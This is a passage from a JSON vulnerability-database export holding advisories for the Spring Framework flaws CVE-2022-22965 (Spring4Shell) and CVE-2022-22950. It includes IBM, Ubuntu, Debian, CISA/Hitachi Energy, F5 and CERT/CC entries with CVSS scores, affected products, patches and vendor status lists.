Remediation/Fixes\n\nTo obtain fixes for all reported issues, customers are advised first to upgrade to v2.0.6.12, and then apply the latest FixPack 2.0.6.13.\n\n_Product_| _VRMF_| _APAR \n_| _Remediation / First Fix_ \n---|---|---|--- \nIBM Data Risk Manager| 2.0.6.12| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.13_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.12&platform=Linux&function=all>) \n \n---|---|---|--- \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-11T15:17:28", "type": "ibm", "title": "Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities including a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2098", "CVE-2012-5783", "CVE-2014-0114", "CVE-2014-3604", "CVE-2014-3643", "CVE-2015-1796", "CVE-2015-4852", "CVE-2015-6420", "CVE-2015-7501", "CVE-2016-1000027", "CVE-2016-10735", "CVE-2016-6796", "CVE-2017-15708", "CVE-2017-18640", "CVE-2018-10237", "CVE-2018-11771", "CVE-2018-1324", "CVE-2018-14040", "CVE-2018-14042", "CVE-2018-20676", "CVE-2018-20677", "CVE-2018-8009", "CVE-2019-10086", "CVE-2019-10202", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-13116", "CVE-2019-17359", "CVE-2019-8331", "CVE-2020-10683", "CVE-2020-13936", "CVE-2020-13954", "CVE-2020-13956", "CVE-2020-15522", "CVE-2020-25704", "CVE-2020-26217", "CVE-2020-26258", "CVE-2020-26259", "CVE-2020-26939", "CVE-2020-28052", "CVE-2020-36322", "CVE-2020-5421", "CVE-2020-7746", "CVE-2020-8908", "CVE-2020-9492", "CVE-2021-21341", "CVE-2021-21342", "CVE-2021-21343", "CVE-2021-21344", "CVE-2021-21345", "CVE-2021-21346", "CVE-2021-21347", "CVE-2021-21348", "CVE-2021-21349", "CVE-2021-21350", "CVE-2021-21351", "CVE-2021-22060", "CVE-2021-22096", "CVE-2021-22118", "CVE-2021-22569", "CVE-2021-23222", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28657", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-35550", "CVE-2021-35603", "CVE-2021-3564", "CVE-2021-3573", "CVE-2021-36090", "CVE-2021-36373", "CVE-2021-3752", "CVE-2021-37714", "CVE-2021-38153", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-40690", "CVE-2021-4155", "CVE-2021-43859", "CVE-2022-0330", "CVE-2022-21248", "CVE-2022-21291", "CVE-2022-21293", "CVE-2022-21294", "CVE-2022-21305", "CVE-2022-21340", "CVE-2022-21341", "CVE-2022-21349", "CVE-2022-21360", "CVE-2022-21365", "CVE-2022-22942", "CVE-2022-22950", "CVE-2022-22965", "CVE-2022-23181", "CVE-2022-23437", "CVE-2022-23596", "CVE-2022-27772"], "modified": "2022-04-11T15:17:28", "id": "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "href": "https://www.ibm.com/support/pages/node/6570915", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-06-08T13:50:27", "description": "n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions,\nit is possible for a user to provide a specially crafted SpEL expression\nthat may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22950", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-04-01T00:00:00", "id": "UB:CVE-2022-22950", "href": "https://ubuntu.com/security/CVE-2022-22950", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "debiancve": [{"lastseen": "2023-06-09T14:40:13", "description": "n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-01T23:15:00", "type": "debiancve", "title": "CVE-2022-22950", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-04-01T23:15:00", "id": "DEBIANCVE:CVE-2022-22950", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22950", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "ics": [{"lastseen": "2023-06-07T15:43:42", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.5**\n * **ATTENTION:** Exploitable remotely/public exploits are available\n * **Vendor:** Hitachi Energy\n * **Equipment:** Lumada Asset Performance Manager (APM)\n * **Vulnerabilities:** Allocation of Resources Without Limits or Throttling, Code injection\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could crash the Prognostic Model Executor and could allow remote code execution.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Lumada Asset Performance Manager with the Prognostic Model Executor Service enabled are affected:\n\n * Lumada Asset Performance Manager (APM) online service (SaaS) version 6.3.220323.0 and prior\n * Lumada Asset Performance Manager (APM) versions 6.0.0.0 to 6.0.0.4\n * Lumada Asset Performance Manager (APM) versions 6.1.0.0 and 6.1.0.1\n * Lumada Asset Performance Manager (APM) versions 6.2.0.0 to 6.2.0.2\n * Lumada Asset Performance Manager (APM) versions 6.3.0.0 to 6.3.0.2\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [ALLOCATION OF RESOURCES WITHOUT LIMITS OR THROTTLING CWE-770](<https://cwe.mitre.org/data/definitions/770.html>)\n\nA vulnerability exists in the Spring Framework component included in the Prognostic Model Executor service of the affected product. An attacker could exploit this vulnerability by sending a specially crafted data or configuration to the application either directly or via integrated applications, causing the Prognostic Model Executor service to fail.\n\n[CVE-2022-22950](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22950>) has been assigned to this vulnerability. A CVSS v3 base score of 3.1 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>)).\n\n#### 3.2.2 [IMPROPER CONTROL OF GENERATION OF CODE ('CODE INJECTION') CWE-94](<https://cwe.mitre.org/data/definitions/94.html>)\n\nA vulnerability in the Spring Framework component included in the Prognostic Model Executor service could allow an attacker to inject arbitrary code for remote code execution.\n\n[CVE-2022-22965](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22965>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Energy\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Switzerland\n\n### 3.4 RESEARCHER\n\nHitachi Energy reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nHitachi Energy recommends applying the most recent patch version of Lumada Asset Performance Management (APM) or upgrading to a newer, unaffected major version:\n\n * Lumada Asset Performance Manager (APM) versions 6.0.0.0 to 6.0.0.4: Apply patch version 6.0.0.5 or upgrade to 6.2.0.3\n * Lumada Asset Performance Manager (APM) versions 6.1.0.0 and 6.1.0.1: Apply patch version 6.1.0.2 or upgrade to 6.2.0.3\n * Lumada Asset Performance Manager (APM) versions 6.2.0.0 to 6.2.0.2: Apply patch version 6.2.0.4 or upgrade to 6.4.0.0\n * Lumada Asset Performance Manager (APM) versions 6.3.0.0 to 6.3.0.2: Apply patch version 6.3.0.3 or upgrade to 6.4.0.0\n\nNote: For Lumada Asset Performance Manager (APM) online service (SaaS) version 6.3.220323.0 and prior, Hitachi Energy has already updated all SaaS environments.\n\nFor additional information, support and to upgrade users should contact [Hitachi Energy](<https://www.hitachienergy.com/contact-us>).\n\nHitachi Energy recommends disabling the Prognostic Model Executor service if users cannot upgrade to the latest patch version.\n\nUsers should be aware that disabling the Prognostic Model Executor service will have the following impact:\n\n * Disabling the Prognostic Model Executor service will cause the Lumada APM application to stop performing condition assessment calculations (for all assets configured to use prognostic models) and to accumulate calculation requests in the internal messaging queue. As the requests in the queue have a limited lifetime (set by messaging bus topic retention), when that lifetime expires, the request will be lost.\n * When the Prognostic Model Executor service is restored to function (after applying the suggested remediation steps and according to the installation guide) it will start processing the accumulated requests. When the period of accumulation is long, this may result in a prolonged period of intensive calculations.\n * If any requests were lost, the affected assets may be missing historical or even current condition assessments. To ensure the current assessments are up to date, the customer should trigger recalculation of condition of all assets using the performance models.\n\nHitachi Energy also recommends following the least privilege principle by limiting and controlling access to the \u201cAdministrator\u201d role or \u201cImport\u201d role privileges in the application programmable interface (API). \nFor more information, users should see Hitachi Energy advisory [8DBD000105](<https://search.abb.com/library/Download.aspx?DocumentID=8DBD000105>).\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure they are [not accessible from the Internet](<https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls and isolate them from business networks.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/Recommended-Practices>) on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>). Several CISA products detailing cyber defense best practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>) in the technical information paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B>).\n\nOrganizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.\n\nThese vulnerabilities have a high attack complexity.\n\n### Vendor\n\nHitachi Energy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-13T12:00:00", "type": "ics", "title": "Hitachi Energy Lumada Asset Performance Management Prognostic Model Executor Service", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-10-13T12:00:00", "id": "ICSA-22-286-05", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-286-05", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2022-04-11T19:29:49", "description": " * Spring Framework RCE (Spring4Shell): [CVE-2022-22965](<https://www.cve.org/CVERecord?id=CVE-2022-22965>)\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n * Spring Framework DoS: [CVE-2022-22950](<https://www.cve.org/CVERecord?id=CVE-2022-22950>)\n\nn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.\n\n * Spring Cloud RCE: [CVE-2022-22963](<https://www.cve.org/CVERecord?id=CVE-2022-22963>)\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nImpact\n\nThere is no impact; F5 products and services and NGINX products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:47:00", "type": "f5", "title": "Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-11T17:28:00", "id": "F5:K11510688", "href": "https://support.f5.com/csp/article/K11510688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2023-06-09T14:44:06", "description": "### Overview\n\nThe Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nThe [Spring Framework](<https://spring.io/>) is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.\n\nExploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.\n\nNCSC-NL has a [list of products and their statuses](<https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>) with respect to this vulnerability.\n\n### Impact\n\nBy providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.\n\n### Solution\n\n#### Apply an update\n\nThis issue is addressed in Spring Framework 5.3.18 and 5.2.20. Please see the [Spring Framework RCE Early Announcement](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by heige.\n\nThis document was written by Will Dormann\n\n### Vendor Information\n\n970766\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Blueriq __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.blueriq.com/en/insights/measures-cve22950-22963-22965>\n\n### BMC Software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=000395541>\n\n### Cisco __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is aware of the vulnerability identified by CVE ID CVE-2022-22950 and with the title \"Spring Expression DoS Vulnerability\". We are following our well-established process to investigate all aspects of the issue. If something is found that our customers need to be aware of and respond to, we will communicate via our established disclosure process.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>\n\n### Dell __ Affected\n\nUpdated: 2022-04-20 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms](<https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms>)\n\n### JAMF software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.jamf.com/t5/jamf-pro/spring4shell-vulnerability/td-p/262584>\n\n### NetApp __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20220401-0001/>\n\n### PTC __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search](<https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search>)\n\n### SAP SE __ Affected\n\nUpdated: 2022-04-13 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n\n### Siemens __ Affected\n\nUpdated: 2022-04-27 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf>\n\n### SolarWinds __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-06\n\n**Statement Date: April 04, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received any reports of these issues from SolarWinds customers but are actively investigating. The following SolarWinds product do utilize the Spring Framework, but have not yet been confirmed to be affected by this issue: \u2022 Security Event Manager (SEM) \u2022 Database Performance Analyzer (DPA) \u2022 Web Help Desk (WHD) While we have not seen or received reports of SolarWinds products affected by this issue, for the protection of their environments, SolarWinds strongly recommends all customers disconnect their public-facing (internet-facing) installations of these SolarWinds products (SEM, DPA, and WHD) from the internet.\n\n#### References\n\n * <https://www.solarwinds.com/trust-center/security-advisories/spring4shell>\n\n### Spring __ Affected\n\nNotified: 2022-03-31 Updated: 2022-03-31\n\n**Statement Date: March 31, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n### VMware __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-03 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.vmware.com/security/advisories/VMSA-2022-0010.html>\n\n### Aruba Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAruba Networks is aware of the issue and we have published a security advisory for our products at https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-006.txt\n\n### Check Point __ Not Affected\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts>)\n\n### Commvault __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://documentation.commvault.com/v11/essential/146231_security_vulnerability_and_reporting.html#cv2022041-spring-framework>\n\n### Elastic __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://discuss.elastic.co/t/spring4shell-spring-framework-remote-code-execution-vulnerability/301229>\n\n### F5 Networks __ Not Affected\n\nNotified: 2022-04-01 Updated: 2022-04-20\n\n**Statement Date: April 15, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nF5 products and services and NGINX products are not affected by CVE-2022-22965.\n\n#### References\n\n * <https://support.f5.com/csp/article/K11510688>\n\n### Jenkins __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.jenkins.io/blog/2022/03/31/spring-rce-CVE-2022-22965/>\n\n### Micro Focus __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.microfocus.com/s/article/KM000005107?language=en_US>\n\n### Okta Inc. __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://sec.okta.com/articles/2022/04/oktas-response-cve-2022-22965-spring4shell>\n\n### Palo Alto Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.paloaltonetworks.com/CVE-2022-22963>\n\n### Pulse Secure __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB45126/?kA13Z000000L3sW>\n\n### Red Hat __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Red Hat products are affected by CVE-2022-22963.\n\n### salesforce.com __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.tableau.com/articles/Issue/Spring4Shell-CVE-2022-22963-and-CVE-2022-22965>\n\n### SonarSource __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.sonarsource.com/t/sonarqube-sonarcloud-and-spring4shell/60926>\n\n### Trend Micro __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-08\n\n**Statement Date: April 06, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://success.trendmicro.com/dcx/s/solution/000290730>\n\n### Ubiquiti __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe UniFi Network application only supports Java 8, which is not affected by this CVE. Still, the upcoming Network Version 7.2 update will upgrade to Spring Framework 5.3.18.\n\n#### References\n\n * <https://community.ui.com/releases/Statement-Regarding-Spring-CVE-2022-22965-2022-22950-and-2022-22963-001/19b2dc6f-4c36-436e-bd38-59ea0d6f1cb5>\n\n### Veritas Technologies __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.veritas.com/content/support/en_US/security/VTS22-006>\n\n### Atlassian __ Unknown\n\nNotified: 2022-04-01 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.developer.atlassian.com/t/attention-cve-2022-22965-spring-framework-rce-investigation/57172>\n\n### CyberArk __ Unknown\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cyberark-customers.force.com/s/article/Spring-Framework-CVE-2022-22965>\n\n### Fortinet __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### 